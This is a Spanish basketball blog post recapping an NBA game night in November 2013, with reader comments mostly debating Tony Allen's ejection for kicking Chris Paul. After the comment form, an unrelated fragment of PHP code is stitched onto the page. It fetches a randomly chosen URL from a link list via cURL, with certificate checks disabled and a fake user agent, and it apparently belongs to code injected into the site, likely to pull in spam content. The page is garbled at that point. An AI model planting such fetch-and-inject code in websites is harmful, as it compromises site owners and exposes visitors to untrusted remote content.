La Crónica: Parejas letales

19 de November de 2013 por Simon

Interesantísima jornada la que vivimos ayer en la NBA con varios partidos imprescindible que cumplieron las expectativas con creces. Casi todos los encuentros de la noche estuvieron muy parejos y dejaron finales emocionantes e impredecibles. Lo mejor de la noche fueron los Grizzlies dominando con su pareja interior a los Clippers y los Thunder que vencieron en un partido apretadísimo a los Nuggets gracias a su letal pareja.

El partido de la jornada sin duda era  la visita de los Grizzlies al Staples Center. Memphis parece que va cogiéndole poco a poco el pulso a la competición y ayer lo demostró ganando a los Clippers en un disputadísimo choque. Memphis Grizzlies siempre llevó la batuta a pesar de la expulsión de Tony Allen en el primer cuarto por propinarle una patada en la cara a Chris Paul, aunque las ventajas eran prácticamente insignificantes y se movieron en el arco de los 4-5 puntos para Memphis. Finalmente el poder de la pareja interior de los de Tennessee fue demasiado para Paul & Griffin que se vieron incapaces de meter mano al rival (106-102). Como hemos dicho, auténtico partidazo del juego interior de los Grizzlies con Gasol rozando el triple doble por tercer partido consecutivo, Randolph convirtiéndose en un auténtico gigante para los interiores de Clippers y Koufos cuajando un partido perfecto en el tiempo que estuvo en pista. Memphis ha despertado justo a tiempo. Las tres victorias consecutivas a domicilio le dan algo de margen para afrontar los próximos 3 partidos en los se enfrentarán a Golden State Warriors, San Antonio Spurs y Houston Rockets. Sin duda una buena forma de calibrar si Memphis ha reaccionado definitivamente o esta racha es un mero espejismo. 

Otro equipo que parece que ha reaccionado y poco a poco va encontrando su mejor juego a pesar de terminar derrotado ayer son los Denver Nuggets de Brian Shaw. Ayer forzaron al máximo a los Thunder que tuvieron que sufrir de lo lindo para derrotarlos. Los de Shaw, liderados por Ty Lawson y JJ Hickson, llevaron el peso del partido casi siempre consiguiendo algunas ventajas que superaron los 10 puntos pero los Thunder le dieron la vuelta al partido en el último cuarto y consiguieron llegar con ventaja al final de partido. Denver tuvo opciones hasta el último segundo pero su última jugada estuvo muy mal gestionada lo que obligó a Hickson a lanzar un tiro a la media vuelta desde mas allá de la línea de 3 puntos que como era de esperar no entró (113-115).

Los que no reaccionan y cada vez tienen peor pinta son los Brooklyn Nets. Ayer sumaron una nueva derrota ante los pujantes Portland Trail Blazers que consiguieron su séptima victoria consecutiva y se consolidan como segundos del Oeste. Un gran primer cuarto de los Nets en el que anotaron 40 puntos parecía que iba a cambiar la tendencia de los de Jason Kidd pero apenas fue un espejismo puesto que a pesar de aguantar bien el segundo cuarto, los Nets desaparecieron en el segundo tiempo en el que se quedaron en apenas 35 puntos. Mientras tanto Portland siguió a lo suyo y se llevó una victoria cómoda (108-98) que les hace mantener a raya a otro equipo joven que viene pegando fuerte como son los Warriors que ayer se deshicieron sin ningún problema de Utah Jazz (98-87). Lo más remarcable del choque fue un golpe en la cabeza que recibió Stephen Curry pero que parece que quedará en nada.

El resto de partidos de la jornada no se quedaron atrás. Dallas Mavericks tuvo que trabajar mucho la victoria ante unos peleones Philadelphia 76ers que continúan vendiendo cara su derrota allá por donde van. Ayer lograron estar por delante en el marcador durante buena parte del encuentro pero al final la experiencia y el saber hacer de los Mavs liderados por Monta Ellis terminó por hacerles sucumbir (94-97). En el duelo de equipos de Play Off del Este entre Chicago Bulls y Charlotte Bobcats la victoria se quedó en el United Center y supone la quinta consecutiva para los pupilos de Tom Thibodeau (81-86). Los Bobcats, que nuevamente no pudieron contar con su estrella Al Jefferson, realizaron un buen partido en una cancha difícil y tuvieron opciones hasta los últimos 30 segundos en el que un triple de Luol Deng, que colocaba a los Bulls 4 arriba, los dejó sin posibilidades de victoria.

PREMIOS

MVP: La pareja Zach Randolph Marc Gasol resultó imparable para los Clippers. El primero se fue a los 26 puntos y 15 rebotes y el español, coqueteó por tercer partido consecutivo con el triple doble al conseguir 23 puntos, 9 rebotes y 8 asistencias. Tampoco vamos a obviar los 38 puntos, 8 rebotes y 6 asistencias de Kevin Durant por mucho a que nos tenga más acostumbrados.

Rookie: Cody Zeller sigue muy regular y aportando en varias facetas. Ayer acabó con 6 puntos, 6 rebotes, 2 asistencias, 2 robos y 1 tapón en 19 minutos. Debutó Shane Larkin en los Mavs tras recuperarse de una fractura en el pie con 3 puntos, 3 asistencias y 3 robos en apenas 9 minutos.

Sorpresa: Buena parte del éxito de los Blazers se debe al nivel que ha empezado la temporada Wesley Matthews. Anochó anotó 24 puntos con 5 triples. Los Nuggets pusieron contra las cuerdas a los Thunder en parte gracias a la buena labor de JJ Hickson que capturó 19 rebotes y anotó 18 puntos. Un hiperactivo Kosta Koufos jugó 18 minutos pero le dio tiempo a anotar 10 puntos, coger 9 rebotes, dar 2 asistencias, robar 2 balones y poner 4 gorros. Pero para sorpresa los 8 puntos, 5 asistencias y 3 rebotes que consiguió el desconocido Diante Garrett. Al final será él el base titular de Utah…

Decepción: Klay Thompson anotó 17 puntos pero necesitó 17 tiros para conseguirlo. Igual de mal lo hizo Paul Pierce, que se quedó en 11 puntos con un 2 de 12 en tiros de campo. Michael Kidd-Gilchrist acabó el partido con tantos puntos como pérdidas, 4.

Esfuerzo en vano: Ty Lawson se sale por todos los lados este año pero, como siempre a principios de temporada, a los Nuggets les cuesta un mundo ganar partidos. Ayer anotó 29 puntos y repartió 8 asistencias. Evan Turner se quedó relativamente cerca del triple-doble con 26 puntos, 9 rebotes y 7 asistencias pero los Sixers no pudieron llevarse la victoria de Dallas por bien poco.

TOP-10

Imágenes | AP Photos / Getty Images

Comenta

20 comentarios a esta entrada

  1. Pop dice:
    #1

    La media de Marc en los 3 últimos partidos: 20 pts, 8’3 reb, 8’3 asist, 1’7 robos, 1 tapón y 94% tiros libres. Espectacular sin duda, sobre todo porque no son fruto de un solo gran partido. Lo único que lo empaña es un pobre 39% de tiros de campo, muy inusual en él.

      Citar

  2. Jose Luis dice:
    #2

    Vaya expulsión de Tony Allen… ¿alguien la ve merecida?

      Citar

  3. Simon dice:
    #3

    Pues Jose Luis a mi me deja confuso porque la verdad da la impresión de que no es malintencionada pero por otra parte levantar la pierna hasta ahí… no se… a mi me deja muy confuso la verdad

      Citar

  4. rumbero dice:
    #4

    Al menos estos Grizzlies de los últimos partidos ya se parecen bastante más a lo que nos tenían acostumbrados. Ritmo más lento, menos tiros y más control del rebote. Después de las finales contra Spurs y con todo un verano por delante se ha habló mucho de que estos ositos tenían que ser una amenaza desde el exterior y encontrar canastas más fáciles en transición para ser realmente peligrosos…pero es que no les ha salido ni de lejos. Y ante la mala pinta que tenía el asunto, Joerger ha vuelto (sabiamente y ante el peligro que corría) a los orígenes, que vienen por funcionar en defensa y mucho protagonismo de la pareja interior. Leía el otro día una estadística que decía que la temporada pasada los Grizzlies permitieron más de 100 puntos en 11 partidos de 82, mientras que en esta llevaban 4 de 8.

    Jose Luis:
    Vaya expulsión de Tony Allen… ¿alguien la ve merecida?

    Si no fuera Tony Allen tendría mis dudas, pero el amigo es de soltar la pierna y los árbitros ya le tienen apuntada la matrícula (no hace ni una semana que ya le pitaron flagrante por una patada a Paul George)

      Citar

  5. Jose Luis dice:
    #5

    Os comprendo, yo creo que si en vez de Chris Paul es Darren Collison, no lo expulsan.

      Citar

  6. rumbero dice:
    #6

    Jose Luis:
    Os comprendo, yo creo que si en vez de Chris Paul es Darren Collison, no lo expulsan.

    Eso también

      Citar

  7. txusma dice:
    #7

    Y exactamente qué esperaba Tony Allen que pasara levantando la pierna hasta esa altura? Su intención es parar a Chris Paul como sea. Para mí bien expulsado, todo tiene un límite.

      Citar

  8. Jose Luis dice:
    #8

    Vaya faltorro el “tapón” de Jeff Adrien en el TOP10 a Taj Gibson, le empuja la mano contra el tablero vaya

      Citar

  9. Ruxixón dice:
    #9

    Joerger sacando resultados en Memphis en base a cargar el juego ofensivo con su parejita interior,mucho ha tardado en darse cuenta que los puntos vienen de ellos.Ha sido como si quisiese dar su propio estilo a Memphis para diferenciarse de Hollins pero se da cuenta que los mejores resultados vienen con la formula ganadora de antaño.A ver si siguen en esa línea ascendente.

    La vuelta de Wilson Chandler les viene fenomenal a Denver,aunque sigo sin verlos como un grupo realmente serio.A la espera de lo que pasará con Faried,se han despejado las dudas -para quien las tuviese- de qué pintan Anthony Randolph y McGee de titulares en un equipo NBA.

      Citar

  10. Ruxixón dice:
    #10

    Por cierto,un par de cosas.Primero,viendo el TOP 10 que jugadorazo ese Livingston,parecía desterrado por las lesiones pero entre Deron y él,calidad-precio,no hay color alguno.

    Sobre lo comentado en vuestro twitter,muy “interesante” esa discusión entre Waiters e Irving,no cabe dudas que si es cierto que hay mal rollo entre ambos,oiremos rumores de traspaso de Waiters en 3,2,1…

      Citar

  11. TheDeerHunter dice:
    #11

    Una patada en la cara, en baloncesto… yo diría que es expulsión de libro.

      Citar

  12. Heineken dice:
    #12

    9 puntos y 7 rebotes de Thomas Robinson en 13 minutos. ¿Recuperado para la causa?

    Por cierto, el nivel de Mo Williams, espectacular de nuevo, el “small ball” que juega Portland con Batum de 4 y Aldridge de 5, jugando con Mo – Lilliard – Wesley por fuera es una de las claves de que esten sacando tan buenos resultados.

    La pena es que luego miran al banquillo y lo que ven es a Freeland, Dorrell Wright (en un estado horrible), Claver (ha ha ha), Earl Watson… A ver cuanto les dura

      Citar

  13. Esteban dice:
    #13

    Heineken:
    9 puntos y 7 rebotes de Thomas Robinson en 13 minutos. ¿Recuperado para la causa?

    Por cierto, el nivel de Mo Williams, espectacular de nuevo, el “small ball” que juega Portland con Batum de 4 y Aldridge de 5, jugando con Mo – Lilliard – Wesley por fuera es una de las claves de que esten sacando tan buenos resultados.

    La pena es que luego miran al banquillo y lo que ven es a Freeland, Dorrell Wright (en un estado horrible), Claver (ha ha ha), Earl Watson… A ver cuanto les dura

    Los Blazers si que tienen buena pinta y con 10 millones por debajo del limite, pueden mejorar aun mas su banca, jugadores buenos en equipos que quieren ser malos como afflalo, turner, green, okafor, Young, Hawes, Gary neal, butler, ridnour, trye, marcus thorton, todos jugadores que podrian ser fichajes a mitad de temporada de los Blazers y apuntar a dar alguna sorpresa

    hoy veo demasiado floja su banca y el puesto de centro suplente, pero tienen espacio para mejorar

      Citar

  14. HisRoyalAirness dice:
    #14

    Jajaja en serio preguntáis si está bien expulsado? Estáis como cabras. Mira que odio a Chris Paul y a los Clippers con todas mis fuerzas pero una patada en la boca, intencionado o no, me parece de libro

      Citar

  15. Esteban dice:
    #15

    HisRoyalAirness:
    Jajaja en serio preguntáis si está bien expulsado? Estáis como cabras. Mira que odio a Chris Paul y a los Clippers con todas mis fuerzas pero una patada en la boca, intencionado o no, me parece de libro

    a mi parecer, levanto la pierna para evitar el pase, y una vez que vio la carita de Paul ahi cerca, termino por elevarla lo suficiente para golpearlo

    nadie intenta bloquear un pase con la pierda hasta el metro ochenta que es donde esta la cabeza de Paul

      Citar

  16. Pop dice:
    #16

    Esteban: a mi parecer, levanto la pierna para evitar el pase, y una vez que vio la carita de Paul ahi cerca, termino por elevarla lo suficiente para golpearlo

    nadie intenta bloquear un pase con la pierda hasta el metro ochenta que es donde esta la cabeza de Paul

    Es que es eso, da igual que la intención no fuese golpearle en la cara. Elevar la pierna a la altura de las caras es suficiente, no puede alegar “yo puse la pierna ahí y él se dio”. Es como saltarse un semáforo y atropellar a alguien “sin intención”.

      Citar

  17. Denise dice:
    #17

    El que está haciendo una temporada pesima es Gilchrist, si miramos fríamente sus números, vemos que está en casi 11 puntos y 6 rebotes, pero si miramos mas detalles, ojo!! en 315 minutos que lleva jugados esta temporada aun no ha metido un solo triple!!, y en tiros libres está en un misero 64%.
    Yo me esperaba un rendimiento mucho mejor que él, y le daba opciones para pelear por el MIP, pero parece que el chaval no da mas de si.

      Citar

  18. The wolf dice:
    #18

    20.000$ vale la canasta 7 del Top-10… que no esta nada mal a todo esto

      Citar

  19. Esteban dice:
    #19

    Vaos a darle tiempo a MCG, yo le veo cierto potencial para hacerse un paul george, no. Ha mostrado nada ofensivamente, pero es un gran defensor, tiene un gran fisico, y una gerencia q confia en el ciegamente, por lo q tendra minutos y tiempo para mejorar

    Ahora tambien es cierto q en dos años aun no ha mejorado nada,

    Yo al q veo muy muy bien es a jeff taylor, un diamante en bruto, exelente defensor y con buena mano de triples, puede hacer un carreron como bruce bowen

      Citar

  20. HisRoyalAirness dice:
    #20

    Creo que lo de la intencionalidad o no en el caso de la patada es irrelevante. Para tomar medidas posteriores sí, de hecho yo no creo que Tony Allen sea tan deficiente como para querer darle una patada en la boca a Paul en el Stapples, teniendo en cuenta como se las gastan los árbitros con los Clippers en los dos últimos años. Pero creo que está bien expulsado y punto, aunque yo lo dejaría ahí, sin multa.
    Aunque podríamos revisar de vez en cuando las normas, comola del flopping, porque a las estrellitas de turno se les consiente demasiado en este aspecto y a otros les mandan avisos. Lebron, CP3, Griffin o Harden son lo más piscinero que hay.
    Y vuelvo a mencionar a Lebron y Harden con respecto a la norma que este año están intentando cumplir que es la de los pasos. Cada penetración de éstos es una infracción

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>